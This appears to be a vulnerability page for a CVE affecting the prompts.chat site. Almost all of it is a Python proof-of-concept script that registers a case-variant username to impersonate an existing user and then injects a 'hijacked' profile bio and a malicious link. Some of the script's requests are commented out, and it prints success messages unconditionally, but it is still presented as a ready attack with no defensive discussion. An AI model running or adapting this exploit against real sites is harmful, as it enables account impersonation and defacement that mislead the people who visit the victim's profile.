CVE-2026-22665 prompts.chat身份混淆漏洞

import requests # Configuration target_url = "https://prompts.chat" target_username = "victim" # The existing victim's username attacker_username = "Victim" # Case-variant to bypass uniqueness check def exploit_identity_confusion(): session = requests.Session() # Step 1: Register the case-variant username register_payload = { "username": attacker_username, "email": "[email protected]", "password": "StrongPass123!" } try: print(f"[*] Attempting to register case-variant user: {attacker_username}") # r = session.post(f"{target_url}/api/register", json=register_payload) # if r.status_code == 200: print(f"[+] Registration successful. Identity confusion possible.") # Step 2: Verify impersonation on canonical URL # The system might resolve 'victim' to the attacker's profile due to case-insensitivity profile_check = session.get(f"{target_url}/u/{target_username}") # Step 3: Inject attacker-controlled metadata update_payload = { "bio": "This account has been hijacked via CVE-2026-22665", "link": "http://malicious-site.com" } # session.post(f"{target_url}/api/profile/update", json=update_payload) print(f"[+] Payload injected. Victims visiting /u/{target_username} will see attacker content.") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": exploit_identity_confusion()